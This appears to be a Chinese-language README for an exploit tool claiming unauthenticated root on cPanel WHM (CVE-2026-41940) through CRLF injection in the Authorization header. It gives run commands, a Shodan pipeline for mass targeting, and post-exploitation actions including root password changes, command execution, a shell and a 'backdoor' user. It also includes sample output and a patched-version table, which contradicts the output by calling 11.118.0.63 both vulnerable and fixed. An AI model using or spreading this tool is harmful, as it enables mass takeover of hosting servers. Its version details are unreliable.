⚡ 未认证 Root – 会话文件 CRLF 注入 ⚡
“一条链,掌控一切。”
┌─────────────────────────────────────────────────────────────┐
│ 阶段 1 ── 生成预认证会话 Cookie │
│ 阶段 2 ── 通过 `Authorization` 头进行 CRLF 注入 │
│ 阶段 3 ── 触发 `do_token_denied`(原始 → 缓存) │
│ 阶段 4 ── 通过 JSON API 验证 WHM Root 访问权限 │
└─────────────────────────────────────────────────────────────┘
💥 结果 – 无需任何凭据即可获得 WHM 的完整 Root 访问权限。
本项目基于 MIT 许可证 发布 – 可自由使用、修改和分发,但请勿作恶 😈。
详情请参阅 LICENSE 文件。
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
零依赖 – 仅需 Python 3 标准库。
无需pip、virtualenv或任何其他工具。
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
一旦你攻陷了目标主机,你可以:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell(完整 WHM 终端)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
配置信息:
目标数 : 1
线程数 : 10
超时时间 : 15s
操作 : 仅扫描
[10:23:15] [SCAN] 开始 4 阶段利用链... https://192.168.1.100:2087
[10:23:15] [INFO] 发现规范主机名: server.example.com
[10:23:15] [STEP] 阶段 1/4 — 生成预认证会话...
[10:23:16] [ OK] 阶段1: 预认证会话 = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] 阶段 2/4 — 通过 Authorization 头进行 CRLF 注入...
[10:23:17] [ OK] 阶段2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] 阶段 3/4 — 触发 do_token_denied 小工具(原始→缓存)...
[10:23:18] [ OK] 阶段3: HTTP 401 — do_token_denied 小工具已触发
[10:23:18] [STEP] 阶段 4/4 — 验证 WHM Root 访问权限...
[10:23:18] [INFO] 阶段4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 已确认 — 获得 WHM Root 访问权限!(v11.118.0.63 — 已确认存在漏洞)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Session : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Version : 11.118.0.63
[10:23:18] [PWND] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — 扫描完成
耗时: 3.2s · 目标数: 1
1 个存在漏洞的目标
[*] 目标 : https://192.168.1.100:2087
[*] 版本 : 11.118.0.63
[*] Token : /cpsess1234567890
[*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Session : 9a7f8e3d2c1b0a9f
[*] 证据 : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
所有低于这些构建版本的版本均存在漏洞。
0xgh057r3c0n – 安全研究员、逆向工程师、咖啡爱好者。
GitHub | Twitter
本工具仅用于授权的安全测试和教育目的。
未经授权访问计算机系统属于违法行为。作者和贡献者不对因使用本软件造成的任何滥用或损害负责。
请负责任地使用,并始终先获得许可。
🔥 攻破网络,但请保持合法。 🔥
| 标志 | 描述 |
|---|
-u, --url | 单个目标 URL(例如 https://host:2087) |
-l, --list | 包含每行一个 URL 的文件 |
--hostname | 覆盖规范 Host 头(自动发现) |
-t, --threads | 线程数(默认:10) |
--timeout | 超时时间(秒)(默认:15) |
--rate-limit | 目标之间的休眠时间(秒) |
--action | 利用后操作:list、passwd、cmd、exec、info、version、shell、adduser |
--passwd | 新的 Root 密码(与 --action passwd 配合使用) |
--cmd | 操作系统命令(与 --action cmd/exec 配合使用) |
--new-user | 新的 cPanel 用户名(与 --action adduser 配合使用) |
--new-domain | 新的 cPanel 域名(与 --action adduser 配合使用) |
-o, --output | 将结果保存为 JSON |
| 分支 | 已修补版本 | 状态 |
|---|
| 11.110 | 11.110.0.97 | 🛡️ 已修复 |
| 11.118 | 11.118.0.63 | 🛡️ 已修复 |
| 11.126 | 11.126.0.54 | 🛡️ 已修复 |
| 11.132 | 11.132.0.29 | 🛡️ 已修复 |
| 11.134 | 11.134.0.20 | 🛡️ 已修复 |
| 11.136 | 11.136.0.5 | 🛡️ 已修复 |